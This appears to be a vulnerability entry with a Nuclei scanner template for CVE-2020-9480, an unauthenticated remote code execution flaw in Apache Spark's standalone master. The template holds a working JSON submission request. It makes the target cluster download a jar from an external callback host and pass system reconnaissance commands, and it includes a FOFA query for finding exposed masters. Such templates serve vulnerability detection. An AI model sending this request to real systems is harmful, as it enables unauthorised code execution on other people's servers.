In Apache Spark 2.4.5 and earlier, a standalone resource manager's master may be configured to require authentication (spark.authenticate) via a shared secret. When enabled, however, a specially-crafted RPC to the master can succeed in starting an application's resources on the Spark cluster, even without the shared key. This can be leveraged to execute shell commands on the host machine. This does not affect Spark clusters using other resource managers (YARN, Mesos, etc).
PoC代码[已公开]
id: CVE-2020-9480
info:
name: Apache Spark - Authentication Bypass
author: riteshs4hu
severity: critical
description: |
In Apache Spark 2.4.5 and earlier, a standalone resource manager's master may be configured to require authentication (spark.authenticate) via a shared secret. When enabled, however, a specially-crafted RPC to the master can succeed in starting an application's resources on the Spark cluster, even without the shared key. This can be leveraged to execute shell commands on the host machine. This does not affect Spark clusters using other resource managers (YARN, Mesos, etc).
reference:
- https://github.com/XiaoShaYu617/CVE-2020-9480/blob/main/20220624_apache_spark_apache_spark_pre-auth_code_execution_cve-2020-9480.py
- https://nvd.nist.gov/vuln/detail/cve-2020-9480
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2020-9480
epss-score: 0.933
epss-percentile: 0.99796
cwe-id: CWE-306
metadata:
verified: true
max-request: 1
vendor: apache
product: spark
fofa-query: port="6066" && banner="Spark Master"
tags: cve,cve2020,apache,spark,auth-bypass,vkev,vuln
variables:
url: "http://{{interactsh-url}}/{{rand_text_alpha(5)}}.jar"
http:
- raw:
- |
POST /v1/submissions/create HTTP/1.1
Host: {{Hostname}}
Content-Type: application/json
{
"action": "CreateSubmissionRequest",
"clientSparkVersion": "2.3.1",
"appArgs": ["whoami,w,cat /proc/version,ifconfig,route,df -h,free -m,netstat -nltp,ps auxf"],
"appResource": "{{url}}",
"environmentVariables": {"SPARK_ENV_LOADED":"1"},
"mainClass": "Exploit",
"sparkProperties": {
"spark.jars": "{{url}}",
"spark.driver.supervise": "false",
"spark.app.name": "Exploit",
"spark.eventLog.enabled": "true",
"spark.submit.deployMode": "cluster",
"spark.master": "spark://{{Hostname}}:6066"
}
}
matchers:
- type: dsl
dsl:
- 'status_code == 200'
- "contains(interactsh_protocol, 'http')"
- 'contains(body, "CreateSubmissionResponse")'
- 'contains_any(body, "submissionId", "driverState")'
condition: and
extractors:
- type: regex
name: submission-id
regex:
- '"submissionId"\s*:\s*"([^"]+)"'
- '"driverState"\s*:\s*"([^"]+)"'
# digest: 4b0a00483046022100df6e7931fb479705d449a6552bec498ffff8cbcfdfc1fb06be4ace6dc10ffe2c0221008adb4be64d95a5c8ae4c8635322bd762906829e661b011ab2d088815f010f7b0:922c64590222798bb761d5b6d8e72950